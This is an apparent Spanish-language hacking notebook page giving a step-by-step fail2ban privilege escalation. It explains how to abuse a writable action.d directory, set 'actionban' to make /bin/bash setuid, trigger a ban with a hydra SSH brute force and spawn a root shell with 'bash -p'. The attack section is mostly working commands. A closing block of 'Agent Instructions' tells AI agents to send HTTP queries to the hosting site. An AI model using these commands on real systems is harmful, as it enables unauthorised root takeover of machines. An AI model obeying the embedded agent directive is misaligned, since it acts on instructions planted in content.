# File2ban Privilege Escalation URL = o URL = Se puede hacer de las 2 manera como proporcione en las 2 `URL's` por lo que se podria hacer lo siguiente... ```shell id ``` Si con esto vemos que estamos en el grupo llamado `Security` y al hacer `sudo -l` podemos ejecutar como `root` el siguiente comando... ``` (root) NOPASSWD: /etc/init.d/fail2ban restart ``` Lo que podremos es reiniciar el servicio de `fail2ban` que su funcion es que cuando detecta que se esta utilizando multiples intentos de `login` o fuerza bruta te banean y en la linea de la configuracion del programa cuando pasa eso hay un comando en concreto estipulado para cuando pasa eso que es el cual cambiaremos para aprovecharlo... ```shell find /etc -writable -ls 2>/dev/null ``` Haciendo eso veremos que podemos escribir y editar cosas dentro del siguiente directorio... ``` drwxrwx--- 2 root security /etc/fail2ban/action.d ``` Dentro de este directorio se encuentra un archivo llamado `iptables-multiport.conf` que es el que controla cuando se banea a una persona que comando se ejecuta, por lo que lo editaremos de la siguiente manera... ```shell mv /etc/fail2ban/action.d/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.bak ``` ```shell cp /etc/fail2ban/action.d/iptables-multiport.bak /etc/fail2ban/action.d/iptables-multiport.conf ``` Y con esto podremos editarlo ya que anteriormente esta con permisos de `root` y no nos dejaba editarlo hacemos este `Bypass` moviendolo con otra extension, por lo que ya estara en nuestro grupo y podremos editarlo, despues lo copiamos para que se quede como estaba asi pudiendo editarlo y que lo detecte el programa cuando se ejecute... ```shell nano /etc/fail2ban/action.d/iptables-multiport.conf #Dentro del nano donde pone 'actionban = ' y el contendio del comando, lo cambiaremos por una inyeccion de coidigo malicioso que nos permita ser root actionban = chmod u+s /bin/bash ^X ``` Con esto los cambios se habrian guardado y con esto hacemos que cuando nos baneen se ejecute ese `chmod`, por lo que haremos lo siguiente... ```shell hydra -l -P ssh:/// -t 64 ``` Echo esto nos banearan y ya tendremos el comando ejecutado volviendo a la maquina victima... Por lo que haremos... ```shell bash -p ``` Y ya seriamos `root`... --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://dise0.gitbook.io/h4cker_b00k/articulos/file2ban-privilege-escalation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.